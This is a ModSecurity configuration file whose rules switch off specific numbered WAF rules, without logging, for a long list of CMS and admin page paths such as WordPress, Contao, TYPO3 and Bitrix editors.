SecRule REQUEST_FILENAME "/editieren_grunddaten\.php" "phase:2,id:92375,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/contao/main\.php" "phase:2,id:92376,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/seo-report\.php" "phase:2,id:92377,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/site_links\.php" "phase:2,id:92378,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/wp-admin/network/themes\.php" "phase:2,id:92379,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/previewtemplate\.php" "phase:2,id:92380,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/distributors/edit\.php" "phase:2,id:92381,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/deref\.php" "phase:2,id:92382,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162"

SecRule REQUEST_FILENAME "/gr_radiostatus_panel/" "phase:2,id:92383,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/typo3/mod\.php" "phase:2,id:92384,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/addmodifyeventui\.php" "phase:2,id:92385,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/addmodifyeventuim\.php" "phase:2,id:92386,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/deleteeventui\.php" "phase:2,id:92387,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/deleteeventuim\.php" "phase:2,id:92388,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/addmodifyblogui\.php" "phase:2,id:92389,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/addmodifybloguim\.php" "phase:2,id:92390,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/bug_update\.php" "phase:2,id:92391,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/func/get-members\.php" "phase:2,id:92392,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340003"

SecRule REQUEST_FILENAME "/update_page\.php" "phase:2,id:92393,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/abf-db\.php" "phase:2,id:92394,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/checkout_yourinfo\.php" "phase:2,id:92395,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/adminhandler\.php" "phase:2,id:92396,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/sadmin/" "phase:2,id:92397,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340113"

SecRule REQUEST_FILENAME "/cms/editcentre\.php" "phase:2,id:92398,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113"

SecRule REQUEST_FILENAME "/admin/content/widget" "phase:2,id:92399,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113"

SecRule REQUEST_FILENAME "/wp-change_domain\.php" "phase:2,id:92400,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/pagetext/edit\.php" "phase:2,id:92401,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113"

SecRule REQUEST_FILENAME "/cms/actueel\.php" "phase:2,id:92402,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113"

SecRule REQUEST_FILENAME "/wp-content/plugins/cws-pb/" "phase:2,id:92403,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/public_file_edit\.php" "phase:2,id:92404,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/editgall\.php" "phase:2,id:92405,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/mod/quiz/" "phase:2,id:92406,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/integration/service\.php" "phase:2,id:92407,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/create_question\.php" "phase:2,id:92408,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340145"

SecRule REQUEST_FILENAME "/wpfb-ajax\.php" "phase:2,id:92409,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/branding\.php" "phase:2,id:92410,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/jackbox_social\.php" "phase:2,id:92411,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/wp-admin/customize\.php" "phase:2,id:92412,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/blog/import" "phase:2,id:92413,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/system/ajax" "phase:2,id:92414,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145"

SecRule REQUEST_FILENAME "/admin/prodedit\.php" "phase:2,id:92415,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/cometchat/admin/" "phase:2,id:92416,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/cgi-bin/dada/plugins/bridge\.cgi" "phase:2,id:92417,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/cms/addcentre\.php" "phase:2,id:92418,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/edit_orders_tax\.php" "phase:2,id:92419,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/whmadmcp/addonmodules\.php" "phase:2,id:92420,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390707"

SecRule REQUEST_FILENAME "property-edit-handler\.php" "phase:2,id:92421,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016"

SecRule REQUEST_FILENAME "/admin/admin_settings_save\.php" "phase:2,id:92422,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/send\.email\.do\.php" "phase:2,id:92423,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/homepage\.php" "phase:2,id:92424,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/wp-content/plugins/backwpup/job/job_run\.php" "phase:2,id:92425,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/project/install/handle_ajax" "phase:2,id:92426,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/cometchat_send\.php" "phase:2,id:92427,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/social_slider_panel/admin\.php" "phase:2,id:92428,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340464,ctl:ruleRemovebyID=340465"

SecRule REQUEST_FILENAME "/ga_node_subserver\.php" "phase:2,id:92429,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/bitrix/admin/fileman_file_edit\.php" "phase:2,id:92430,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/bitrix/tools/autosave\.php" "phase:2,id:92431,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/wp-admin/plugin-editor\.php" "phase:2,id:92432,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340213"

SecRule REQUEST_FILENAME "/admin/picaimport\.php" "phase:2,id:92433,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/backend/event_insert" "phase:2,id:92434,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/build_email" "phase:2,id:92435,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/sadmin/responsivefilemanager" "phase:2,id:92436,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/fixddbb\.php" "phase:2,id:92437,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/ajax_upload/" "phase:2,id:92438,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/supportkb\.php" "phase:2,id:92439,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340145"

SecRule REQUEST_FILENAME "/template_update\.php" "phase:2,id:92440,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/editevents\.php" "phase:2,id:92441,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/edit_workshops\.php" "phase:2,id:92442,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/useredit\.php" "phase:2,id:92443,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admincp/staff/staff_edit\.php" "phase:2,id:92444,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113"

SecRule REQUEST_FILENAME "/configproducts\.php" "phase:2,id:92445,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/wp-admin/post\.php" "phase:2,id:92446,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=380026"

SecRule REQUEST_FILENAME "/ajax/api/" "phase:2,id:92447,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/ajax\.adm_server\.php" "phase:2,id:92448,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/ftlocal\.html" "phase:2,id:92449,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/articles/editarticle\.php" "phase:2,id:92450,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/autosave-ajax\.php" "phase:2,id:92451,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/cmsmodules/ecommerce/pages/tools" "phase:2,id:92452,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/products_frameset\.aspx" "phase:2,id:92453,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/contenu/contenu\.php" "phase:2,id:92454,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin_sklep/index\.php" "phase:2,id:92455,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/course/edit\.php" "phase:2,id:92456,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/wp-admin/admin\.php" "phase:2,id:92457,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/funcs\.php" "phase:2,id:92458,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/ibd-admin/add_article\.php" "phase:2,id:92459,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/articles/editpicarticle\.php" "phase:2,id:92460,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/news/create" "phase:2,id:92461,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/products/add\.php" "phase:2,id:92462,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/products/edit\.php" "phase:2,id:92463,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/_editor/index\.php" "phase:2,id:92464,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380016"

SecRule REQUEST_FILENAME "/stk/index\.php" "phase:2,id:92465,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/services/bmwidget\.json" "phase:2,id:92466,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/services/bmcontent\.json" "phase:2,id:92467,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/store_edit\.php" "phase:2,id:92468,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

